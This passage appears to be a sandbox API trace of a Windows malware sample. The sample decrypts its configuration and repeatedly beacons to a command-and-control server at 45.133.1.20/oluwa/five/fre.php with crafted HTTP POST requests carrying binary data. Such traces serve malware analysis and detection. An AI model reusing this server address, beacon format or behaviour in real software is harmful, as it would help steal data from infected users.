GetProcessHeap () returned 0x6a0000 [0166.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0166.961] recv (in: s=0x30c, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0167.039] GetProcessHeap () returned 0x6a0000 [0167.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0167.041] GetProcessHeap () returned 0x6a0000 [0167.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.042] GetProcessHeap () returned 0x6a0000 [0167.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0167.042] GetProcessHeap () returned 0x6a0000 [0167.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0167.043] closesocket (s=0x30c) returned 0 [0167.043] GetProcessHeap () returned 0x6a0000 [0167.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0167.043] GetProcessHeap () returned 0x6a0000 [0167.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.044] GetProcessHeap () returned 0x6a0000 [0167.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0167.044] GetProcessHeap () returned 0x6a0000 [0167.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0167.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd98) returned 0x30c [0167.047] Sleep (dwMilliseconds=0xea60) [0167.049] GetProcessHeap () returned 0x6a0000 [0167.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0167.067] GetProcessHeap () returned 0x6a0000 [0167.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba088 [0167.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.068] CryptImportKey (in: hProv=0x6bef48, pbData=0x6ba088, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0167.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.069] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.070] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.070] GetProcessHeap () returned 0x6a0000 [0167.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba088 | out: hHeap=0x6a0000) returned 1 [0167.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.073] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0167.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.078] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0167.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.098] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0167.098] GetProcessHeap () returned 0x6a0000 [0167.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.100] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0167.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.101] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0167.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.102] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0167.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.103] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0167.103] GetProcessHeap () returned 0x6a0000 [0167.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0167.103] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0167.103] GetProcessHeap () returned 0x6a0000 [0167.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0167.104] GetProcessHeap () returned 0x6a0000 [0167.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.105] GetProcessHeap () returned 0x6a0000 [0167.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.106] GetProcessHeap () returned 0x6a0000 [0167.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.108] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.115] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0167.124] GetProcessHeap () returned 0x6a0000 [0167.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.125] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0167.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.127] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.128] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.128] GetProcessHeap () returned 0x6a0000 [0167.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.130] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0167.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.131] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0167.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.132] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0167.132] GetProcessHeap () returned 0x6a0000 [0167.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.133] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0167.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.134] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0167.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.136] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0167.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.137] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0167.137] GetProcessHeap () returned 0x6a0000 [0167.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0167.137] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0167.137] GetProcessHeap () returned 0x6a0000 [0167.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0167.137] socket (af=2, type=1, protocol=6) returned 0x310 [0167.138] connect (s=0x310, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0167.165] FreeAddrInfoW (pAddrInfo=0x6b9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0167.165] GetProcessHeap () returned 0x6a0000 [0167.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0167.165] GetProcessHeap () returned 0x6a0000 [0167.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0167.166] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.167] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0167.167] GetProcessHeap () returned 0x6a0000 [0167.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0167.167] GetProcessHeap () returned 0x6a0000 [0167.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.168] GetProcessHeap () returned 0x6a0000 [0167.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0167.168] GetProcessHeap () returned 0x6a0000 [0167.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0167.169] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.171] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0167.171] GetProcessHeap () returned 0x6a0000 [0167.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0167.171] GetProcessHeap () returned 0x6a0000 [0167.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.171] send (s=0x310, buf=0x6bbd20*, len=242, flags=0) returned 242 [0167.172] send (s=0x310, buf=0x6bb998*, len=159, flags=0) returned 159 [0167.172] GetProcessHeap () returned 0x6a0000 [0167.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0167.172] recv (in: s=0x310, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0167.243] GetProcessHeap () returned 0x6a0000 [0167.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0167.245] GetProcessHeap () returned 0x6a0000 [0167.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0167.247] GetProcessHeap () returned 0x6a0000 [0167.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0167.248] GetProcessHeap () returned 0x6a0000 [0167.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0167.248] closesocket (s=0x310) returned 0 [0167.249] GetProcessHeap () returned 0x6a0000 [0167.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0167.249] GetProcessHeap () returned 0x6a0000 [0167.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.250] GetProcessHeap () returned 0x6a0000 [0167.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.251] GetProcessHeap () returned 0x6a0000 [0167.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0167.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1330) returned 0x310 [0167.253] Sleep (dwMilliseconds=0xea60) [0167.255] GetProcessHeap () returned 0x6a0000 [0167.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.264] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0167.271] GetProcessHeap () returned 0x6a0000 [0167.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9968 [0167.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.274] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b9968, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0167.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.275] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.277] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.277] GetProcessHeap () returned 0x6a0000 [0167.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9968 | out: hHeap=0x6a0000) returned 1 [0167.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.278] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0167.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.280] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0167.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.284] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0167.284] GetProcessHeap () returned 0x6a0000 [0167.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.285] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0167.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.287] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0167.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.288] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0167.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.289] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0167.289] GetProcessHeap () returned 0x6a0000 [0167.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0167.289] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0167.289] GetProcessHeap () returned 0x6a0000 [0167.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0167.290] GetProcessHeap () returned 0x6a0000 [0167.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.290] GetProcessHeap () returned 0x6a0000 [0167.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0167.290] GetProcessHeap () returned 0x6a0000 [0167.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.304] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0167.314] GetProcessHeap () returned 0x6a0000 [0167.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.315] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0167.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.317] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.318] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.318] GetProcessHeap () returned 0x6a0000 [0167.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.321] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0167.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.323] CryptDestroyKey (hKey=0x6ad020) returned 1 [0167.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.325] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0167.325] GetProcessHeap () returned 0x6a0000 [0167.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.327] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0167.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.329] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0167.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.333] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0167.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.334] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0167.335] GetProcessHeap () returned 0x6a0000 [0167.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0167.335] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9fc8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0167.335] GetProcessHeap () returned 0x6a0000 [0167.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0167.335] socket (af=2, type=1, protocol=6) returned 0x314 [0167.335] connect (s=0x314, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0167.358] FreeAddrInfoW (pAddrInfo=0x6b9fc8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0167.358] GetProcessHeap () returned 0x6a0000 [0167.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0167.358] GetProcessHeap () returned 0x6a0000 [0167.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0167.359] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.361] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0167.361] GetProcessHeap () returned 0x6a0000 [0167.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0167.361] GetProcessHeap () returned 0x6a0000 [0167.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.362] GetProcessHeap () returned 0x6a0000 [0167.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0167.362] GetProcessHeap () returned 0x6a0000 [0167.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0167.363] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0167.364] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0167.364] GetProcessHeap () returned 0x6a0000 [0167.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0167.364] GetProcessHeap () returned 0x6a0000 [0167.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0167.365] send (s=0x314, buf=0x6bbd20*, len=242, flags=0) returned 242 [0167.366] send (s=0x314, buf=0x6bb998*, len=159, flags=0) returned 159 [0167.366] GetProcessHeap () returned 0x6a0000 [0167.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0167.366] recv (in: s=0x314, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0167.435] GetProcessHeap () returned 0x6a0000 [0167.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0167.437] GetProcessHeap () returned 0x6a0000 [0167.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0167.437] GetProcessHeap () returned 0x6a0000 [0167.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0167.437] GetProcessHeap () returned 0x6a0000 [0167.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: 